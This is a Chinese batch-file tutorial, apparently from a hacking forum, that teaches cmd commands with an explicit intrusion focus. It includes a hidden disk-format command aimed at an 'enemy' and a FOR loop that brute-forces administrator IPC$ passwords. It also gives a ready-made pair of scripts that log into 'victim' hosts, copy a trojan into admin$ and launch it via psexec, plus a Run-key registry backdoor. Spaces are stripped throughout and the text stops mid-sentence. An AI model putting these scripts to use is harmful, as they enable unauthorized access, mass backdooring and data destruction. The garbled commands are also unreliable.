就是把DOS命令寫在一個(gè)文本文件里面

就是把DOS命令寫在一個(gè)文本文件里面，然后保存的時(shí)候保存成"所有文件",文件名是名字.bat就可以了。不過BAT文件有很多特殊命令...批處理制作教程批處理文件是無格式的文本文件，它包含一條或多條命令。它的文件擴(kuò)展名為.bat或.cmd。在命令提示下鍵入批處理文件的名稱，或者雙擊該批處理文件，系統(tǒng)就會(huì)調(diào)用Cmd.exe按照該文件中各個(gè)命令出現(xiàn)的順序來逐個(gè)運(yùn)行它們。在無盤運(yùn)用及Hack入侵過程中，經(jīng)常都會(huì)用到。一.簡(jiǎn)單批處理內(nèi)部命令簡(jiǎn)介1.Echo命令打開回顯或關(guān)閉請(qǐng)求回顯功能，或顯示消息。如果沒有任何參數(shù)，echo命令將顯示當(dāng)前回顯設(shè)置。語法echo[{onoff}][message]Sample：@echooff/echohelloworld在實(shí)際應(yīng)用中我們會(huì)把這條命令和重定向符號(hào)（也稱為管道符號(hào)，一般用>>>）結(jié)合來實(shí)現(xiàn)輸入一些命令到特定格式的文件中.這將在以后的例子中體現(xiàn)出來。2.@命令表示不顯示@后面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能讓對(duì)方看到你使用的命令啦。Sample：@echooff@echoNowinitializingtheprogram,pleasewaitaminite...@formatX:/q/u/autoset(format這個(gè)命令是不可以使用/y這個(gè)參數(shù)的，可喜的是微軟留了個(gè)autoset這個(gè)參數(shù)給我們，效果和/y是一樣的。)3.Goto命令指定跳轉(zhuǎn)到標(biāo)簽，找到標(biāo)簽后，程序?qū)⑻幚韽南乱恍虚_始的命令。語法：gotolabel（label是參數(shù)，指定所要轉(zhuǎn)向的批處理程序中的行。）Sample：if{%1}=={}gotonoparmsif{%2}=={}gotonoparms（如果這里的if、%1、%2你不明白的話，先跳過去，后面會(huì)有詳細(xì)的解釋。）@Remcheckparametersifnullshowusage:noparmsechoUsage:monitor.batServerIPPortNumbergotoend標(biāo)簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個(gè)：用來表示這個(gè)字母是標(biāo)簽，goto命令就是根據(jù)這個(gè)：來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會(huì)理解你的意圖啊。4.Rem命令注釋命令，在C語言中相當(dāng)與/*--------*/,它并不會(huì)被執(zhí)行，只是起一個(gè)注釋的作用，便于別人閱讀和你自己日后修改。RemMessageSample：@RemHereisthedescription.5.Pause命令運(yùn)行Pause命令時(shí)，將顯示下面的消息：Pressanykeytocontinue...Sample：@echooff:begincopya:*.*d：\backechoPleaseputanewdiskintodriverApausegotobegin在這個(gè)例子中，驅(qū)動(dòng)器A中磁盤上的所有文件均復(fù)制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅(qū)動(dòng)器A時(shí)，pause命令會(huì)使程序掛起，以便您更換磁盤，然后按任意鍵繼續(xù)處理。6.Call命令從一個(gè)批處理程序調(diào)用另一個(gè)批處理程序，并且不終止父批處理程序。call命令接受用作調(diào)用目標(biāo)的標(biāo)簽。如果在腳本或批處理文件外使用Call，它將不會(huì)在命令行起作用。語法call[[Drive:][Path]FileName[BatchParameters]][:label[arguments]]參數(shù)[Drive:}[Path]FileName指定要調(diào)用的批處理程序的位置和名稱。filename參數(shù)必須具有.bat或.cmd擴(kuò)展名。7.start命令調(diào)用外部程序，所有的DOS命令和命令行程序都可以由start命令來調(diào)用。入侵常用參數(shù)：MIN開始時(shí)窗口最小化SEPARATE在分開的空間內(nèi)開始16位Windows程序HIGH在HIGH優(yōu)先級(jí)類別開始應(yīng)用程序REALTIME在REALTIME優(yōu)先級(jí)類別開始應(yīng)用程序WAIT啟動(dòng)應(yīng)用程序并等候它結(jié)束parameters這些為傳送到命令/程序的參數(shù)執(zhí)行的應(yīng)用程序是32-位GUI應(yīng)用程序時(shí)，CMD.EXE不等應(yīng)用程序終止就返回命令提示。如果在命令腳本內(nèi)執(zhí)行，該新行為則不會(huì)發(fā)生。8.choice命令choice使用此命令可以讓用戶輸入一個(gè)字符，從而運(yùn)行不同的命令。使用時(shí)應(yīng)該加/c:參數(shù)，c:后應(yīng)寫提示可輸入的字符，之間無空格。它的返回碼為1234……如:choice/c:dmedefrag,mem,end被當(dāng)作命令行，傳遞到一個(gè)子CMD.EXE，其輸出會(huì)被抓進(jìn)內(nèi)存，并被當(dāng)作文件分析。因此，以下例子:FOR/F"usebackqdelims=="%iIN(`set`)DO@echo%i會(huì)枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱。另外，F(xiàn)OR變量參照的替換已被增強(qiáng)。您現(xiàn)在可以使用下列選項(xiàng)語法:~I-刪除任何引號(hào)(")，擴(kuò)充%I%~fI-將%I擴(kuò)充到一個(gè)完全合格的路徑名%~dI-僅將%I擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)%~pI-僅將%I擴(kuò)充到一個(gè)路徑%~nI-僅將%I擴(kuò)充到一個(gè)文件名%~xI-僅將%I擴(kuò)充到一個(gè)文件擴(kuò)展名%~sI-擴(kuò)充的路徑只含有短名%~aI-將%I擴(kuò)充到文件的文件屬性%~tI-將%I擴(kuò)充到文件的日期/時(shí)間%~zI-將%I擴(kuò)充到文件的大小%~$PATH:I-查找列在路徑環(huán)境變量的目錄，并將%I擴(kuò)充到找到的第一個(gè)完全合格的名稱。如果環(huán)境變量未被定義，或者沒有找到文件，此組合鍵會(huì)擴(kuò)充空字符串可以組合修飾符來得到多重結(jié)果:%~dpI-僅將%I擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)和路徑%~nxI-僅將%I擴(kuò)充到一個(gè)文件名和擴(kuò)展名%~fsI-僅將%I擴(kuò)充到一個(gè)帶有短名的完整路徑名%~dp$PATH:i-查找列在路徑環(huán)境變量的目錄，并將%I擴(kuò)充到找到的第一個(gè)驅(qū)動(dòng)器號(hào)和路徑。%~ftzaI-將%I擴(kuò)充到類似輸出線路的DIR在以上例子中，%I和PATH可用其他有效數(shù)值代替。%~語法用一個(gè)有效的FOR變量名終止。選取類似%I的大寫變量名比較易讀，而且避免與不分大小寫的組合鍵混淆。以上是MS的官方幫助，下面我們舉幾個(gè)例子來具體說明一下For命令在入侵中的用途。sample2：利用For命令來實(shí)現(xiàn)對(duì)一臺(tái)目標(biāo)Win2k主機(jī)的暴力密碼破解。我們用netuse\\ip\ipc$"password"/u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接，當(dāng)成功時(shí)記下密碼。最主要的命令是一條：for/fi%in(dict.txt)donetuse\\ip\ipc$"i%"/u:"administrator"用i%來表示admin的密碼，在dict.txt中這個(gè)取i%的值用netuse命令來連接。然后將程序運(yùn)行結(jié)果傳遞給find命令－－for/fi%%in(dict.txt)donetuse\\ip\ipc$"i%%"/u:"administrator"│find":命令成功完成">>D:\ok.txt，這樣就ko了。sample3：你有沒有過手里有大量肉雞等著你去種后門＋木馬呢？，當(dāng)數(shù)量特別多的時(shí)候，原本很開心的一件事都會(huì)變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡(jiǎn)化日?；蛑貜?fù)性任務(wù)。那么如何實(shí)現(xiàn)呢？呵呵，看下去你就會(huì)明白了。主要命令也只有一條：（在批處理文件中使用FOR命令時(shí)，指定變量使用%%variable）@for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcalldoor.bat%%i%%j%%ktokens的用法請(qǐng)參見上面的sample1，在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)%i%j%k。而cultivate.bat無非就是用netuse命令來建立IPC$連接，并copy木馬＋后門到victim，然后用返回碼（Iferrorlever=）來篩選成功種植后門的主機(jī)，并echo出來，或者echo到指定的文件。delims=表示vivtim.txt中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內(nèi)容是什么樣的了。應(yīng)該根據(jù)%%i%%j%%k表示的對(duì)象來排列，一般就是ippasswordusername。代碼雛形：---------------cutherethensaveasabatchfile(Icallitmain.bat)---------------------------@echooff@if"%1"==""gotousage@for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcallIPChack.bat%%i%%j%%k@gotoend:usage@echorunthisbatchindosmodle.orjustdouble-clickit.:end---------------cutherethensaveasabatchfile(Icallitmain.bat)----------------------------------------------cutherethensaveasabatchfile(Icallitdoor.bat)-----------------------------@netuse\\%1\ipc$%3/u:"%2"@iferrorlevel1gotofailed@echoTryingtoestablishtheIPC$connection…………OK@copywindrv32.exe\\%1\admin$\system32&&ifnoterrorlevel1echoIP%1USER%2PWD%3>>ko.txt@p***ec\\%1c:\winnt\system32\windrv32.exe@p***ec\\%1netstartwindrv32&&ifnoterrorlevel1echo%1Backdoored>>ko.txt:failed@echoSorrycannotconnectedtothevictim.-----------------cutherethensaveasabatchfile(Icallitdoor.bat)--------------------------------這只是一個(gè)自動(dòng)種植后門批處理的雛形，兩個(gè)批處理和后門程序（Windrv32.exe）,PSexec.exe需放在統(tǒng)一目錄下.批處理內(nèi)容尚可擴(kuò)展,例如:加入清除日志+DDOS的功能,加入定時(shí)添加用戶的功能,更深入一點(diǎn)可以使之具備自動(dòng)傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.二.如何在批處理文件中使用參數(shù)批處理中可以使用參數(shù)，一般從1%到9%這九個(gè)，當(dāng)有多個(gè)參數(shù)時(shí)需要用shift來移動(dòng)，這種情況并不多見，我們就不考慮它了。sample1：fomat.bat@echooffif"%1"=="a"formata::format@formata:/q/u/auotset@echopleaseinsertanotherdisktodriverA.@pause@gotofomat這個(gè)例子用于連續(xù)地格式化幾張軟盤，所以用的時(shí)候需在dos窗口輸入fomat.bata，呵呵,好像有點(diǎn)畫蛇添足了～^_^sample2：當(dāng)我們要建立一個(gè)IPC$連接地時(shí)候總要輸入一大串命令，弄不好就打錯(cuò)了，所以我們不如把一些固定命令寫入一個(gè)批處理，把肉雞地ippasswordusername當(dāng)著參數(shù)來賦給這個(gè)批處理，這樣就不用每次都打命令了。@echooff@netuse\\1%\ipc$"2%"/u:"3%"注意哦，這里PASSWORD是第二個(gè)參數(shù)。@iferrorlevel1echoconnectionfailed怎么樣,使用參數(shù)還是比較簡(jiǎn)單的吧？你這么帥一定學(xué)會(huì)了^_^.No.3三.如何使用組合命令(CompoundCommand)1.&Usage：第一條命令&第二條命令[&第三條命令...]用這種方法可以同時(shí)執(zhí)行多條命令，而不管命令是否執(zhí)行成功Sample：C:\>dirz:&dirc:\Ex4rchThesystemcannotfindthepathspecified.VolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofc:\Ex4rch2002-05-1423:51<DIR>.2002-05-1423:51<DIR>..2002-05-1423:5114sometips.gif2.&&Usage：第一條命令&&第二條命令[&&第三條命令...]用這種方法可以同時(shí)執(zhí)行多條命令，當(dāng)碰到執(zhí)行出錯(cuò)的命令后將不執(zhí)行后面的命令，如果一直沒有出錯(cuò)則一直執(zhí)行完所有命令；Sample：C:\>dirz:&&dirc:\Ex4rchThesystemcannotfindthepathspecified.C:\>dirc:\Ex4rch&&dirz:VolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofc:\Ex4rch2002-05-1423:55<DIR>.2002-05-1423:55<DIR>..2002-05-1423:5514sometips.gif1File(s)14bytes2Dir(s)768,671,744bytesfreeThesystemcannotfindthepathspecified.在做備份的時(shí)候可能會(huì)用到這種命令會(huì)比較簡(jiǎn)單，如：dirfile://192.168.0.1/database/backup.mdb&©file://192.168.0.1/database/backup.mdbE:\backup如果遠(yuǎn)程服務(wù)器上存在backup.mdb文件，就執(zhí)行copy命令，若不存在該文件則不執(zhí)行copy命令。這種用法可以替換IFexist了：）3.││Usage：第一條命令││第二條命令[││第三條命令...]用這種方法可以同時(shí)執(zhí)行多條命令，當(dāng)碰到執(zhí)行正確的命令后將不執(zhí)行后面的命令，如果沒有出現(xiàn)正確的命令則一直執(zhí)行完所有命令；Sample：C:\Ex4rch>dirsometips.gif││delsometips.gifVolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofC:\Ex4rch2002-05-1423:5514sometips.gif1File(s)14bytes0Dir(s)768,696,320bytesfree組合命令使用的例子：sample：@copytrojan.exe\\%1\admin$\system32&&ifnoterrorlevel1echoIP%1USER%2PASS%3>>victim.txt四、管道命令的使用1.│命令Usage：第一條命令│第二條命令[│第三條命令...]將第一條命令的結(jié)果作為第二條命令的參數(shù)來使用，記得在unix中這種方式很常見。sample：time/t>>D:\IP.lognetstat-n-ptcp│find":3389">>D:\IP.logstartExplorer看出來了么？用于終端服務(wù)允許我們?yōu)橛脩糇远x起始的程序，來實(shí)現(xiàn)讓用戶運(yùn)行下面這個(gè)bat，以獲得登錄用戶的IP。2.>、>>輸出重定向命令將一條命令或某個(gè)程序輸出結(jié)果的重定向到特定文件中,>與>>的區(qū)別在于，>會(huì)清除調(diào)原有文件中的內(nèi)容后寫入指定文件，而>>只會(huì)追加內(nèi)容到指定文件中，而不會(huì)改動(dòng)其中的內(nèi)容。sample1：echohelloworld>c:\hello.txt(stupidexample?)sample2:時(shí)下DLL木馬盛行，我們知道system32是個(gè)捉迷藏的好地方，許多木馬都削尖了腦袋往那里鉆，DLL馬也不例外，針對(duì)這一點(diǎn)我們可以在安裝好系統(tǒng)和必要的應(yīng)用程序后，對(duì)該目錄下的EXE和DLL文件作一個(gè)記錄：運(yùn)行CMD--轉(zhuǎn)換目錄到system32--dir*.exe>exeback.txt&dir*.dll>dllback.txt,這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,日后如發(fā)現(xiàn)異常但用傳統(tǒng)的方法查不出問題時(shí),則要考慮是不是系統(tǒng)中已經(jīng)潛入DLL木馬了.這時(shí)我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然后運(yùn)行:CMD--fcexeback.txtexeback1.txt>diff.txt&fcdllback.txtdllback1.txt>diff.txt.(用FC命令比較前后兩次的DLL和EXE文件,并將結(jié)果輸入到diff.txt中),這樣我們就能發(fā)現(xiàn)一些多出來的DLL和EXE文件,然后通過查看創(chuàng)建時(shí)間、版本、是否經(jīng)過壓縮等就能夠比較容易地判斷出是不是已經(jīng)被DLL木馬光顧了。沒有是最好，如果有的話也不要直接DEL掉，先用regsvr32/utrojan.dll將后門DLL文件注銷掉,再把它移到回收站里，若系統(tǒng)沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。3.<、>&、<&<從文件中而不是從鍵盤中讀入命令輸入。>&將一個(gè)句柄的輸出寫入到另一個(gè)句柄的輸入中。<&從一個(gè)句柄讀取輸入并將其寫入到另一個(gè)句柄輸出中。這些并不常用，也就不多做介紹。No.5五.如何用批處理文件來操作注冊(cè)表在入侵過程中經(jīng)?；夭僮髯?cè)表的特定的鍵值來實(shí)現(xiàn)一定的目的，例如:為了達(dá)到隱藏后門、木馬程序而刪除Run下殘余的鍵值?；蛘邉?chuàng)建一個(gè)服務(wù)用以加載后門。當(dāng)然我們也會(huì)修改注冊(cè)表來加固系統(tǒng)或者改變系統(tǒng)的某個(gè)屬性，這些都需要我們對(duì)注冊(cè)表操作有一定的了解。下面我們就先學(xué)習(xí)一下如何使用.REG文件來操作注冊(cè)表.(我們可以用批處理來生成一個(gè)REG文件)關(guān)于注冊(cè)表的操作，常見的是創(chuàng)建、修改、刪除。1.創(chuàng)建創(chuàng)建分為兩種，一種是創(chuàng)建子項(xiàng)(Subkey)我們創(chuàng)建一個(gè)文件，內(nèi)容如下：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]然后執(zhí)行該腳本，你就已經(jīng)在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創(chuàng)建了一個(gè)名字為“hacker”的子項(xiàng)。另一種是創(chuàng)建一個(gè)項(xiàng)目名稱那這種文件格式就是典型的文件格式，和你從注冊(cè)表中導(dǎo)出的文件格式一致，內(nèi)容如下：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch""Door"=C:\\WINNT\\system32\\door.exe"Autodos"=dword:02這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下新建了:Invader、door、about這三個(gè)項(xiàng)目Invader的類型是“StringValue”door的類型是“REGSZValue”Autodos的類型是“DWORDValue”2.修改修改相對(duì)來說比較簡(jiǎn)單，只要把你需要修改的項(xiàng)目導(dǎo)出，然后用記事本進(jìn)行修改，然后導(dǎo)入（regedit/s）即可。3.刪除我們首先來說說刪除一個(gè)項(xiàng)目名稱，我們創(chuàng)建一個(gè)如下的文件：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Ex4rch"=-執(zhí)行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了；我們?cè)倏纯磩h除一個(gè)子項(xiàng)，我們創(chuàng)建一個(gè)如下的腳本：WindowsRegistryEditorVersion5.00[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]執(zhí)行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經(jīng)被刪除了。相信看到這里，.reg文件你基本已經(jīng)掌握了。那么現(xiàn)在的目標(biāo)就是用批處理來創(chuàng)建特定內(nèi)容的.reg文件了，記得我們前面說道的利用重定向符號(hào)可以很容易地創(chuàng)建特定類型的文件。samlpe1:如上面的那個(gè)例子,如想生成如下注冊(cè)表文件WindowsRegistryEditorVersion